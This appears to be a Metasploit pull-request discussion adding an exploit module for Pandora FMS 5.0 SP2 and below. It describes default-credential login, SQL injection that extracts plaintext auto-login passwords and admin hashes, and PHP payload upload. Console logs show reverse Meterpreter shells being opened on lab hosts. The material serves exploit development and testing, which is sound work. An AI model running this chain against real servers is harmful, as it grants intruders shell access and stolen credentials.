Added Pandora FMS RCE and SQLi module

[pyoor]

***This is a corrected PR to replace PR #2979

Remote Code Execution in Pandora FMS 5.0 SP2 and below (Tested on 4.0.2/4.1.1/5.0SP2 appliances).

How to replicate the vulnerable environment:

Download Pandora FMS 5.2 SP2: http://sourceforge.net/projects/pandora/files/Pandora%20FMS%205.0/FinalSP2/PandoraFMS5.0SP2-131226_64bit.iso/download

This module performs several steps in order to gain RCE. First, the module attempts to authenticate using default credentials. If this fails a SQL injection vulnerability affecting the mobile login form is exploited. Pandora FMS implements an "Auto login" hash which stores plaintext passwords in the database. Leveraging the SQLi, the plain-text password is extracted and used to authenticate. Once authenticated, this module will leverage the file manager functionality in order to upload a PHP payload.

If all methods fail the SQLi is leveraged in order to extract the admin MD5 password hash for offline cracking.

Using default credentials:

msf > use exploit/linux/http/pandorafms_sqli 
msf exploit(pandorafms_sqli) > show options

Module options (exploit/linux/http/pandorafms_sqli):

   Name       Current Setting    Required  Description
   ----       ---------------    --------  -----------
   PASS       pandora            no        The password to authenticate with
   Proxies                       no        Use a proxy chain
   RHOST                         yes       The target address
   RPORT      80                 yes       The target port
   TARGETURI  /pandora_console/  yes       The URI of the vulnerable Pandora FMS instance
   USER       admin              no        The username to authenticate with
   VHOST                         no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Pandora FMS version <= 5.0 SP2


msf exploit(pandorafms_sqli) > set RHOST 192.168.0.117
RHOST => 192.168.0.117
msf exploit(pandorafms_sqli) > exploit

[*] Started reverse handler on 192.168.0.134:4444 
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:pandora)
[*] 192.168.0.117:80 - Successfully authenticated!
[*] 192.168.0.117:80 - Attempting to retrieve session cookie
[*] 192.168.0.117:80 - Successfully retrieved session cookie: PHPSESSID=8vulgtr2l7c38b7ev6kv1jlg27
[*] 192.168.0.117:80 - Attempting to inject payload
[*] 192.168.0.117:80 - Successfully injected payload
[*] Sending stage (39195 bytes) to 192.168.0.117
[*] Meterpreter session 1 opened (192.168.0.134:4444 -> 192.168.0.117:40361) at 2014-02-11 13:01:03 -0500
[*] 192.168.0.117:80 - Cleaning script remnants
[*] 192.168.0.117:80 - Script removed successfully

Using "Auto login" hash mechanism:

[*] Started reverse handler on 192.168.0.134:4444 
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:badpassword)
[-] 192.168.0.117:80 - Authentication failed!
[*] 192.168.0.117:80 - Attempting to extract auto login hash
[*] 192.168.0.117:80 - Extracted auto login password (foobar123)
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:foobar123)
[*] 192.168.0.117:80 - Successfully authenticated!
[*] 192.168.0.117:80 - Attempting to retrieve session cookie
[*] 192.168.0.117:80 - Successfully retrieved session cookie: PHPSESSID=hifh2b2vnscfjn196p8p4tskh3
[*] 192.168.0.117:80 - Attempting to inject payload
[*] 192.168.0.117:80 - Successfully injected payload
[*] Sending stage (39195 bytes) to 192.168.0.117
[*] Meterpreter session 2 opened (192.168.0.134:4444 -> 192.168.0.117:40362) at 2014-02-11 13:02:46 -0500
[*] 192.168.0.117:80 - Cleaning script remnants
[*] 192.168.0.117:80 - Script removed successfully

Resort to password extraction:

[*] Started reverse handler on 192.168.0.134:4444 
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:badpassword)
[-] 192.168.0.117:80 - Authentication failed!
[*] 192.168.0.117:80 - Attempting to extract auto login hash
[-] 192.168.0.117:80 - No auto login password has been defined!
[*] 192.168.0.117:80 - Attempting to extract admin password hash
[*] 192.168.0.117:80 - Extracted admin password hash - [ 1da7ee7d45b96d0e1f45ee4ee23da560 ]
[-] Exploit failed: 192.168.0.117:80 - Unable to perform remote code execution!

[wchen-r7]

Thanks for the update. You're not actually replacing the current Pandora exploit, though. You're adding another one. It would make more sense to simply update the file in my opinion.

[pyoor]

@wchen-r7 Sorry, I'm confused. Has PR #2979 already been fully merged?
The reason I issued this PR is because #2979 showed 0 commits and I had already deleted that branch.

Also this PR includes the changes requested by @jlee-r7 and @jvazquez-r7

[wchen-r7]

Yes sir, it got merged: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/pandora_fms_exec.rb

[jlee-r7]

@wchen-r7 no, this is a different bug.

[wchen-r7]

Ah ok. My bad.

[jlee-r7]

I have no idea what is up with #2979, but i'll take this one.

[jlee-r7]

Don't use and. && instead, please

[pyoor]

Implemented @jlee-r7 requested changes with commit faae51f

[pyoor]

@jlee-r7 Is everything good with the latest commit? I just wanted to make sure that I addressed all of your change requests.

[jvazquez-r7]

Thanks @pyoor ! waiting to listen from travis and testing...

[jvazquez-r7]

Exploits looks like working:

msf exploit(pandorafms_sqli) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.137:80 - Attempting to authenticate using (admin:pandora)
[*] 192.168.172.137:80 - Successfully authenticated!
[*] 192.168.172.137:80 - Attempting to retrieve session cookie
[*] 192.168.172.137:80 - Successfully retrieved session cookie: PHPSESSID=6e66ucgkun60oqe8tlr9imd834;
[*] 192.168.172.137:80 - Attempting to upload payload
[*] 192.168.172.137:80 - Successfully uploaded payload
[*] Sending stage (39848 bytes) to 192.168.172.137
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.137:33137) at 2014-03-28 17:54:16 -0500
[*] 192.168.172.137:80 - Cleaning script remnants
[-] 192.168.172.137:80 - Could not identify file manager form!
[!] 192.168.172.137:80 - Failed to remove yFTyUBDf.php

meterpreter > ls

Listing: /var/www/html/pandora_console/images
=============================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  1381   fil   2014-03-28 11:52:54 -0500  AzbMMllu.php
100644/rw-r--r--  5615   fil   2013-12-25 19:12:19 -0600  MiniLogoArtica.jpg
100644/rw-r--r--  1440   fil   2013-12-25 19:12:19 -0600  add.disabled.png
100644/rw-r--r--  1437   fil   2013-12-25 19:12:19 -0600  add.png

but not the check method:

msf exploit(pandorafms_sqli) > check
[*] 192.168.172.137:80 - Cannot reliably check exploitability.

[jvazquez-r7]

Doesn't look consistent with the description, maybe a typo :?

[jvazquez-r7]

I would recommend change the filename to be snake_case compliant:

git mv modules/exploits/linux/http/pandorafms_sqli.rb modules/exploits/linux/http/pandora_fms_sqli.rb 

[jvazquez-r7]

Looks like you're not using FileDropper, but cleaning by yourself in cleanup.

[jvazquez-r7]

ping @pyoor, do you mind to take care of the comments please? thanks!

[jvazquez-r7]

Looks like the author has abandoned this one :( I'm going to try to make the clean up by myself, and hopefully landing.

[jvazquez-r7]

Finished the PR by myself, see final result here: c82acfe

Thanks @pyoor for your submission. If you don't feel comfortable with any change in the landed version, please feel free to do a new pull request. Finished clean up by myself because it lived in the pull request queue too much time. Thanks!

• Testing:

msf exploit(pandora_fms_sqli) > check
[*] 172.16.158.134:80 - The target appears to be vulnerable.
msf exploit(pandora_fms_sqli) > set VERBOSE true
VERBOSE => true
msf exploit(pandora_fms_sqli) > check

[*] 172.16.158.134:80 - Trying to detect installed version
[*] 172.16.158.134:80 - Pandora FMS 5.0SP2 found
[*] 172.16.158.134:80 - The target appears to be vulnerable.
msf exploit(pandora_fms_sqli) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.134:80 - Attempting to authenticate using (admin:pandora)
[*] 172.16.158.134:80 - Successfully authenticated!
[*] 172.16.158.134:80 - Attempting to retrieve session cookie
[*] 172.16.158.134:80 - Successfully retrieved session cookie: PHPSESSID=s1l1pc45m23jujmm46g64rm714;
[*] 172.16.158.134:80 - Uploading PHP payload...
[*] 172.16.158.134:80 - Attempting to upload payload YTDhlSEr.php...
[*] 172.16.158.134:80 - Successfully uploaded payload
[*] 172.16.158.134:80 - Executing payload...
[*] Sending stage (40551 bytes) to 172.16.158.134
[+] Deleted YTDhlSEr.php

meterpreter > getuid
Server username: apache (48)
meterpreter > exit
[*] Shutting down Meterpreter...
msf exploit(pandora_fms_sqli) > set USER badlogin
USER => badlogin
msf exploit(pandora_fms_sqli) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.134:80 - Attempting to authenticate using (badlogin:pandora)
[-] 172.16.158.134:80 - Authentication failed!
[*] 172.16.158.134:80 - Attempting to extract auto login hash via SQLi
[-] 172.16.158.134:80 - No auto login password has been defined!
[*] 172.16.158.134:80 - Attempting to extract admin password hash with SQLi
[+] 172.16.158.134:80 - Extracted admin password hash, unsalted md5 - [ 1da7ee7d45b96d0e1f45ee4ee23da560 ]
[-] Exploit failed [no-access]: 172.16.158.134:80 - Unable to perform remote code execution!
[*] Exploit completed, but no session was created.